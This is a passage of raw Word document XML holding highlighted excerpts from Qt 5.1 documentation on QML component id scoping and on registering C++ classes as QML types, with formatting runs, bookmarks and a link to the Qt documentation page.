        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">objects, as </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id values are only accessible from within the component scope in which a component is declared</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The</w:t>
      </w:r>
      <w:r w:rsidR="00B170D3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SquareButton</w:t>
      </w:r>
      <w:r w:rsidR="00B170D3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object definition above cannot refer to</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mouseArea</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in order to refer to the</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId182" w:history="1">
        <w:r w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>child, and if it had an</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id</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>of</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root</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rather than</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w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, this would not conflict with the</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id</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>of the same value for the root object defined in</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SquareButton.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00187F1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as the two would be declared within separate scopes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00187F1A" w:rsidRPr="00B170D3" w:rsidRDefault="00187F1A" w:rsidP="00187F1A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00E7621B" w:rsidRDefault="00490E7E" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId183" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00E7621B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00E7621B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>project</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00E7621B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>org</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00E7621B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>doc</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00E7621B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00E7621B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>-5.1/</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qtqml</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00E7621B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qtqml</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00E7621B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>cppintegration</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00E7621B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>definetypes</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00E7621B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00187F1A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00DA77C2" w:rsidP="00B170D3">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="249" w:name="_Toc483000585"/>
      <w:bookmarkStart w:id="250" w:name="_Toc483003606"/>
      <w:bookmarkStart w:id="251" w:name="_Toc483603937"/>
      <w:bookmarkStart w:id="252" w:name="_Toc483605157"/>
      <w:r w:rsidRPr="00E7621B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Defining QML Types from C++</w:t>
      </w:r>
      <w:bookmarkEnd w:id="249"/>
      <w:bookmarkEnd w:id="250"/>
      <w:bookmarkEnd w:id="251"/>
      <w:bookmarkEnd w:id="252"/>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When extending QML with C++ code, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C++ class can be registered with the QML type system to enable the class to be used as a data type within QML code.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> While the properties, methods and signals of any</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId184" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-derived class are accessible from QML, as discussed in</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId185" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Exposing Attributes of C++ Types to QML</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, such a class cannot be used as a data type from QML until it is registered with the type system. </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Additionally registration can provide other features, such as allowing a class to be used as an instantiable</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId186" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML object type</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>from QML, or enabling a singleton instance of the class to be imported and used from QML.</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highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Additionally, the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId187" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt QML</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">module </w:t>
      </w:r>
      <w:r w:rsidRPr="00B170D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>provides mechanisms for implementing QML-specific features such as</w:t>
      </w:r>
      <w:r w:rsidRPr="00B170D3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B170D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attached properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00B170D3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B170D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00B170D3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B170D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>default properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00B170D3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B170D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in C++.</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(Note that a number of the important concepts covered in this document are demonstrated in the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId188" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Writing QML Extensions with C++</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tutorial.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00DA77C2" w:rsidP="00B170D3">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="253" w:name="registering-c-types-with-the-qml-type-sy"/>
      <w:bookmarkStart w:id="254" w:name="_Toc483000586"/>
      <w:bookmarkStart w:id="255" w:name="_Toc483003607"/>
      <w:bookmarkStart w:id="256" w:name="_Toc483603938"/>
      <w:bookmarkStart w:id="257" w:name="_Toc483605158"/>
      <w:bookmarkEnd w:id="253"/>
      <w:r w:rsidRPr="00B170D3">
